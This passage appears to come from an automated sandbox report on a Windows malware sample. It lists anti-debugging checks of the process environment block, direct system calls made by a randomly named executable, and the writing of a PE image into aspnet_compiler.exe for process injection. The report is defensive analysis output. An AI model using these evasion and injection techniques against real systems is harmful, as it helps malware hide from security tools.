            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AA645D mov eax, dword ptr fs:[00000030h]3_2_01AA645D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD245A mov eax, dword ptr fs:[00000030h]3_2_01AD245A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB07AF mov eax, dword ptr fs:[00000030h]3_2_01AB07AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B647A0 mov eax, dword ptr fs:[00000030h]3_2_01B647A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5678E mov eax, dword ptr fs:[00000030h]3_2_01B5678E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD27ED mov eax, dword ptr fs:[00000030h]3_2_01AD27ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD27ED mov eax, dword ptr fs:[00000030h]3_2_01AD27ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD27ED mov eax, dword ptr fs:[00000030h]3_2_01AD27ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB47FB mov eax, dword ptr fs:[00000030h]3_2_01AB47FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB47FB mov eax, dword ptr fs:[00000030h]3_2_01AB47FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3E7E1 mov eax, dword ptr fs:[00000030h]3_2_01B3E7E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABC7C0 mov eax, dword ptr fs:[00000030h]3_2_01ABC7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B307C3 mov eax, dword ptr fs:[00000030h]3_2_01B307C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2C730 mov eax, dword ptr fs:[00000030h]3_2_01B2C730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEC720 mov eax, dword ptr fs:[00000030h]3_2_01AEC720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEC720 mov eax, dword ptr fs:[00000030h]3_2_01AEC720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE273C mov eax, dword ptr fs:[00000030h]3_2_01AE273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE273C mov ecx, dword ptr fs:[00000030h]3_2_01AE273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE273C mov eax, dword ptr fs:[00000030h]3_2_01AE273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEC700 mov eax, dword ptr fs:[00000030h]3_2_01AEC700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB0710 mov eax, dword ptr fs:[00000030h]3_2_01AB0710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE0710 mov eax, dword ptr fs:[00000030h]3_2_01AE0710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB8770 mov eax, dword ptr fs:[00000030h]3_2_01AB8770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0770 mov eax, dword ptr fs:[00000030h]3_2_01AC0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE674D mov esi, dword ptr fs:[00000030h]3_2_01AE674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE674D mov eax, dword ptr fs:[00000030h]3_2_01AE674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE674D mov eax, dword ptr fs:[00000030h]3_2_01AE674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B34755 mov eax, dword ptr fs:[00000030h]3_2_01B34755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3E75D mov eax, dword ptr fs:[00000030h]3_2_01B3E75D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB0750 mov eax, dword ptr fs:[00000030h]3_2_01AB0750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2750 mov eax, dword ptr fs:[00000030h]3_2_01AF2750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2750 mov eax, dword ptr fs:[00000030h]3_2_01AF2750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEC6A6 mov eax, dword ptr fs:[00000030h]3_2_01AEC6A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE66B0 mov eax, dword ptr fs:[00000030h]3_2_01AE66B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB4690 mov eax, dword ptr fs:[00000030h]3_2_01AB4690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB4690 mov eax, dword ptr fs:[00000030h]3_2_01AB4690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E6F2 mov eax, dword ptr fs:[00000030h]3_2_01B2E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E6F2 mov eax, dword ptr fs:[00000030h]3_2_01B2E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E6F2 mov eax, dword ptr fs:[00000030h]3_2_01B2E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E6F2 mov eax, dword ptr fs:[00000030h]3_2_01B2E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B306F1 mov eax, dword ptr fs:[00000030h]3_2_01B306F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B306F1 mov eax, dword ptr fs:[00000030h]3_2_01B306F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEA6C7 mov ebx, dword ptr fs:[00000030h]3_2_01AEA6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEA6C7 mov eax, dword ptr fs:[00000030h]3_2_01AEA6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB262C mov eax, dword ptr fs:[00000030h]3_2_01AB262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACE627 mov eax, dword ptr fs:[00000030h]3_2_01ACE627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE6620 mov eax, dword ptr fs:[00000030h]3_2_01AE6620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE8620 mov eax, dword ptr fs:[00000030h]3_2_01AE8620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]3_2_01AC260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]3_2_01AC260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]3_2_01AC260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]3_2_01AC260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]3_2_01AC260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]3_2_01AC260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC260B mov eax, dword ptr fs:[00000030h]3_2_01AC260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2619 mov eax, dword ptr fs:[00000030h]3_2_01AF2619
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E609 mov eax, dword ptr fs:[00000030h]3_2_01B2E609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEA660 mov eax, dword ptr fs:[00000030h]3_2_01AEA660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEA660 mov eax, dword ptr fs:[00000030h]3_2_01AEA660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7866E mov eax, dword ptr fs:[00000030h]3_2_01B7866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7866E mov eax, dword ptr fs:[00000030h]3_2_01B7866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE2674 mov eax, dword ptr fs:[00000030h]3_2_01AE2674
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ACC640 mov eax, dword ptr fs:[00000030h]3_2_01ACC640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B389B3 mov esi, dword ptr fs:[00000030h]3_2_01B389B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B389B3 mov eax, dword ptr fs:[00000030h]3_2_01B389B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B389B3 mov eax, dword ptr fs:[00000030h]3_2_01B389B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB09AD mov eax, dword ptr fs:[00000030h]3_2_01AB09AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB09AD mov eax, dword ptr fs:[00000030h]3_2_01AB09AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC29A0 mov eax, dword ptr fs:[00000030h]3_2_01AC29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3E9E0 mov eax, dword ptr fs:[00000030h]3_2_01B3E9E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE29F9 mov eax, dword ptr fs:[00000030h]3_2_01AE29F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE29F9 mov eax, dword ptr fs:[00000030h]3_2_01AE29F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7A9D3 mov eax, dword ptr fs:[00000030h]3_2_01B7A9D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B469C0 mov eax, dword ptr fs:[00000030h]3_2_01B469C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]3_2_01ABA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]3_2_01ABA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]3_2_01ABA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]3_2_01ABA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]3_2_01ABA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABA9D0 mov eax, dword ptr fs:[00000030h]3_2_01ABA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE49D0 mov eax, dword ptr fs:[00000030h]3_2_01AE49D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3892A mov eax, dword ptr fs:[00000030h]3_2_01B3892A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B4892B mov eax, dword ptr fs:[00000030h]3_2_01B4892B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3C912 mov eax, dword ptr fs:[00000030h]3_2_01B3C912
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AA8918 mov eax, dword ptr fs:[00000030h]3_2_01AA8918
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AA8918 mov eax, dword ptr fs:[00000030h]3_2_01AA8918
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E908 mov eax, dword ptr fs:[00000030h]3_2_01B2E908
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2E908 mov eax, dword ptr fs:[00000030h]3_2_01B2E908
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF096E mov eax, dword ptr fs:[00000030h]3_2_01AF096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF096E mov edx, dword ptr fs:[00000030h]3_2_01AF096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF096E mov eax, dword ptr fs:[00000030h]3_2_01AF096E
            Source: C:\Users\user\Desktop\x.exe; Process token adjusted: Debug
            Source: C:\Users\user\Desktop\x.exe; Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\x.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtCreateMutant: Direct from: 0x774635CC
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtWriteVirtualMemory: Direct from: 0x77462E3C
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtMapViewOfSection: Direct from: 0x77462D1C
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtResumeThread: Direct from: 0x774636AC
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtProtectVirtualMemory: Direct from: 0x77462F9C
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtSetInformationProcess: Direct from: 0x77462C5C
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtNotifyChangeKey: Direct from: 0x77463C2C
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtProtectVirtualMemory: Direct from: 0x77457B2E
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtAllocateVirtualMemory: Direct from: 0x77462BFC
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtQueryInformationProcess: Direct from: 0x77462C26
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtResumeThread: Direct from: 0x77462FBC
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtReadFile: Direct from: 0x77462ADC
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtQuerySystemInformation: Direct from: 0x77462DFC
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtDelayExecution: Direct from: 0x77462DDC
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtAllocateVirtualMemory: Direct from: 0x77463C9C
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtClose: Direct from: 0x77462B6C
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtCreateUserProcess: Direct from: 0x7746371C
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtWriteVirtualMemory: Direct from: 0x7746490C
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtAllocateVirtualMemory: Direct from: 0x774648EC
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtQuerySystemInformation: Direct from: 0x774648CC
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtQueryVolumeInformationFile: Direct from: 0x77462F2C
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtReadVirtualMemory: Direct from: 0x77462E8C
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtCreateKey: Direct from: 0x77462C6C
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtSetInformationThread: Direct from: 0x77462B4C
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtQueryAttributesFile: Direct from: 0x77462E6C
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtDeviceIoControlFile: Direct from: 0x77462AEC
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtOpenSection: Direct from: 0x77462E0C
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtCreateFile: Direct from: 0x77462FEC
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtOpenFile: Direct from: 0x77462DCC
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtSetInformationThread: Direct from: 0x77462ECC
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtQueryInformationToken: Direct from: 0x77462CAC
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtTerminateThread: Direct from: 0x77462FCC
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtAllocateVirtualMemory: Direct from: 0x77462BEC
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe; NtOpenKeyEx: Direct from: 0x77462B9C
            Source: C:\Users\user\Desktop\x.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
